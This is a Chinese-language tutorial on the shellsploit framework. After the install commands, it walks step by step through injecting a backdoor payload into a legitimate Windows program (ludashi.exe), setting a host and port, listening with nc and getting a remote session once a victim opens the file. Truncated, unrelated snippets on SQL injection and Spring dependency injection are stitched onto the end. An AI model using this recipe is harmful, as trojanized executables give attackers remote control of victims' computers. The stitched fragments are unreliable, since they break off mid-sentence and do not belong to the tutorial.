shellsploit讓您為各種作業系統生成自定義的shellcode,後門,注入器。讓我們通過編碼器對每個位元組進行混淆。
github:
依賴安裝
root$ sudo pip install capstone
root$ sudo pip install readline(not necessary for windows coz preinstalled in shellsploit)
root$ sudo pip install pefile
root$ sudo pip install colorama
root$ sudo pip install pylzma
安裝pip在windows/nix機器上都沒有問題安裝命令如下:
root$ python setup.py –s/ –-setup install
root$ chmod +x shellsploit (if you are using windows just pass this step)
root$ ./shellsploit
1.使用shellsploit可以看到執行介面,其實使用方法和msf類似,差不多!
2.比如我在這裡檢視injectors注入模組
ssf> show injectors
3.使用injectors模組其中乙個
ssf>use injectors/windows/bfd/patching
4.檢視下他裡面有什麼選項(其實和msf設定方法差不多)
ssf:injectors/windows/bfd/patching > show options
5.剩下的設定file 、host、port 這些選擇,進行一些設定,其中的file選擇我已經將模板放到了目錄當中。
6.進行payload注入,注入後的模板放入到了—file /root/shellsploit-framework/704125575/ludashi.exe
ssf:injectors/windows/bfd/patching > inject
7.使用nc進行監聽
8.開啟payload得到會話
這裡可能有些小小的bug,但影響並不大我們依然可以得到會話。
簡析 SQL注入
什麼是sql注入 所謂sql注入,就是通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。怎樣做到的 既然已經是執行惡意的sql命令了,那麼 犯罪分子 是怎樣欺騙伺服器的呢?它是利用現有應用程式,將 惡意 的sql命令注入到後台資料庫引擎執...
依賴注入 set方法注入 構造器注入
屬性注入即通過setter 方法注入bean 的屬性值或依賴的物件 屬性注入使用 元素,使用 name 屬性指定 bean 的屬性名稱,value 屬性或 子節點指定屬性值 屬性注入是實際應用中最常用的注入方式 通過構造方法注入bean 的屬性值或依賴的物件,它保證了 bean 例項在例項化後就可以...
依賴注入 setting注入和構造器注入
本文介紹依賴注入的兩種方式 setting注入和構造器注入 這裡通過乙個簡單的例子來講解依賴注入的兩種方式,我們先創造乙個stage類,有了stage就需要performer,所以我們將 performer注入到stage。創造兩個類stage和performer public class perf...